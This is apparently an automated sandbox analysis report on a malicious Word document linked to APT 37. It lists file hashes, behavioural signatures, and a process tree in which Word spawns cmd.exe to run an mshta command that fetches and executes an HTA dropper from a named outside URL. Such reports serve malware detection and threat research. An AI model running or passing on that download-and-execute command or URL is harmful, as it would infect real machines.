Analysis

  • max time kernel
    145s
  • max time network
    151s
  • platform
    windows7_x64
  • resource
    win7-20230220-en
  • resource tags

    arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
  • submitted
    21-03-2023 23:28

General

  • Target

    APT 37 Previous Commits 3/NEW(주)ì— ì—스ë¶ìŠ¤ 사업ìžë“±ë¡ì¦.doc

  • Size

    768KB

  • MD5

    e89725778e52fa571a229cc6e65acd8d

  • SHA1

    11e14587aa9e4c3039a214b21d63a616a32aa01b

  • SHA256

    0474bb7c100c5187c838e5cf14969fdaf04ed541e373aa3b1ad607dd2b420a1b

  • SHA512

    cf070d7c2cd2f2006b55da592f4db8758ec94d3608d91bebef3ba958ac34bbabffa7dc2f17f52a77349ea922e6efbd22fddb74b6aaadd37593be2f28c3bcbb82

  • SSDEEP

    12288:5eNs9H0fEccVGYEOH1uW7vyaQaHbB/g+1ev/6d6htoWHdttOOJVYqTz:YeRcBc1u6tHHbm/QUoW9XOO8

Score
10/10

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://attiferstudio.com/install.bak/sony/10.html

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 10 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\APT 37 Previous Commits 3\NEW(주)ì— ì—스ë¶ìŠ¤ 사업ìžë“±ë¡ì¦.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1960
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c mshta http://attiferstudio.com/install.bak/sony/10.html
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:520
      • C:\Windows\SysWOW64\mshta.exe
        mshta http://attiferstudio.com/install.bak/sony/10.html
        3⤵
        • Blocklisted process makes network request
        • Modifies Internet Explorer settings
        PID:360

Network

MITRE ATT&CK Matrix ATT&CK v6

Defense Evasion

Modify Registry

1
T1112

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
    Filesize

    20KB

    MD5

    7f4dbf31428f09fe93efabe50c88457f

    SHA1

    ff6acb05aa2b88ffa157635e840a808914164462

    SHA256

    5022a438a0209c4644f4251e80a6b898696f2badba18b9ca73468cf6fbd1fb80

    SHA512

    57338624e9f70856d9051d46ceba4ea112c68c2c87cb77c56961782061aca43f08463fceda188a94449258bd3690b5f7463035852c8f128ea9e8da9e3f7d3f86

  • memory/1960-54-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB

  • memory/1960-57-0x0000000000290000-0x0000000000390000-memory.dmp
    Filesize

    1024KB

  • memory/1960-59-0x0000000000290000-0x0000000000390000-memory.dmp
    Filesize

    1024KB

  • memory/1960-58-0x0000000000290000-0x0000000000390000-memory.dmp
    Filesize

    1024KB

  • memory/1960-60-0x0000000000290000-0x0000000000390000-memory.dmp
    Filesize

    1024KB

  • memory/1960-63-0x0000000000290000-0x0000000000390000-memory.dmp
    Filesize

    1024KB

  • memory/1960-90-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB